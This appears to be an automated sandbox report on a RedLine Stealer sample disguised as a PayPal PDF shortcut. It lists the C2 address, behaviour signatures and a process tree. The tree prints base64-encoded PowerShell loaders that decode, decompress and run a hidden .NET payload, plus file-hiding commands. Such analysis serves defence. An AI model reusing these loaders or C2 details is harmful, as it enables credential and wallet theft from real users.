Analysis

  • max time kernel
    201s
  • max time network
    181s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-03-2023 13:05

General

  • Target

    PayPal/PayPal.pdf.lnk

  • Size

    1KB

  • MD5

    107b9436dbcd42961940b6549d56bc30

  • SHA1

    496b1651773af6e336850e27cbfea1ad43b14b40

  • SHA256

    ebb82404cc0433ad70cef97ee13659e2af5094f83888d1e59f1469a13e742ff1

  • SHA512

    e26da458afd812114741a1dada545949a2f12c071913c08fb403bb0ebf3e519f6e47bf9d6e84ef24162d51fabd433c40ee03834e8e7d0592a0ad72dee3079398

Malware Config

Extracted

Family

redline

Botnet

GST5

C2

5.79.91.233:38435

Attributes
  • auth_value

    1faf1998ff417661be7ea5f7b386eafb

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\PayPal\PayPal.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4108
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C start "" /B "%CD%\thumb\entry.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3684
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\entry.bat"
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2352
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3448
          • C:\Windows\system32\attrib.exe
            attrib +s +h C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe
            5⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:2260
          • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe
            C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAKkAKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCpACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2720
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4468
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
              6⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:1416
          • C:\Windows\system32\attrib.exe
            attrib -s -h C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe
            5⤵
            • Views/modifies file attributes
            PID:5096
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3296
          • C:\Windows\system32\attrib.exe
            attrib +s +h C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe
            5⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:1068
          • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe
            C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4124
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA5AA==
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4792
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4880
          • C:\Windows\system32\attrib.exe
            attrib -s -h C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe
            5⤵
            • Views/modifies file attributes
            PID:396
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\terms.pdf"
          4⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1412
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2960
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4CE76818CD6741F2E47E62F67BE572CD --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              6⤵
                PID:2200
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D2601705E6979F59F2F8D5ED2F96581D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D2601705E6979F59F2F8D5ED2F96581D --renderer-client-id=2 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job /prefetch:1
                6⤵
                  PID:1308
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A9FC562B5EF7400EFAD6F5E1B78BA0D5 --mojo-platform-channel-handle=2156 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  6⤵
                    PID:4964
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7828362BB07254AF9BE8E2964F6550E9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7828362BB07254AF9BE8E2964F6550E9 --renderer-client-id=5 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job /prefetch:1
                    6⤵
                      PID:376
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=88ABDFBD2B46A09EBB8D513E5CD812F3 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      6⤵
                        PID:2832
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=73C3BAED3216C642129EF8C8412BA306 --mojo-platform-channel-handle=2224 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        6⤵
                          PID:2128
              • C:\Windows\System32\CompPkgSrv.exe
                C:\Windows\System32\CompPkgSrv.exe -Embedding
                1⤵
                  PID:4484

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                  Filesize

                  36KB

                  MD5

                  b30d3becc8731792523d599d949e63f5

                  SHA1

                  19350257e42d7aee17fb3bf139a9d3adb330fad4

                  SHA256

                  b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                  SHA512

                  523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                  Filesize

                  56KB

                  MD5

                  752a1f26b18748311b691c7d8fc20633

                  SHA1

                  c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                  SHA256

                  111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                  SHA512

                  a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                  Filesize

                  64KB

                  MD5

                  52faf3db361c08b3dbae961caddc9a34

                  SHA1

                  18940b485af7e0c5a2f7ef252ca6d8e803f71184

                  SHA256

                  0f4701d9f743978747e853b65a4bcb434ac692827c9a122d22ff2bbeadcca0f6

                  SHA512

                  df7f4a147d559837308b45b2744365cc8f5da39a7afe8827c908bf4146b09c3968ad4fad2627f17822c82be266e67845918afb40cd9d6c6f90d8b955f3671bd8

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Filesize

                  53KB

                  MD5

                  06ad34f9739c5159b4d92d702545bd49

                  SHA1

                  9152a0d4f153f3f40f7e606be75f81b582ee0c17

                  SHA256

                  474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

                  SHA512

                  c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  16KB

                  MD5

                  a50c4d48a1f833cba49e36aec3660b91

                  SHA1

                  53d6032e8d76afe56a9d0c4c7653e2807aa6b431

                  SHA256

                  1febddff7f66b2f7a653c3519d3c20e5f8aed45bfc5584631b240a0c3c87a155

                  SHA512

                  33519f2bb2acd8c90e688ae7e475f9ff66785f22a5153f22aca011dab2ae0e69cbc0f27c60014a2ab0054111eb32ff43297b13b8027b0ef0e02e543b845332e7

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  17KB

                  MD5

                  6fd43409f08a18d69172e62783cdc77d

                  SHA1

                  8ece2a88f3f940e9908b62f93da662d53c589f8a

                  SHA256

                  7f310648ed2a335a8a3ced4bde9bd2768518cf2d3c9112b94656c8fba48cd430

                  SHA512

                  20d12dd20b86a7800b9d571ab44fbbe859378940548a8f0ec5e9833c849102928a913f40cd6e5bc033f713c55501ea129e40bda5a880cbde0eec036bf1051951

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  1e2d28e98af3eb3f5ca6dc37e96eb67a

                  SHA1

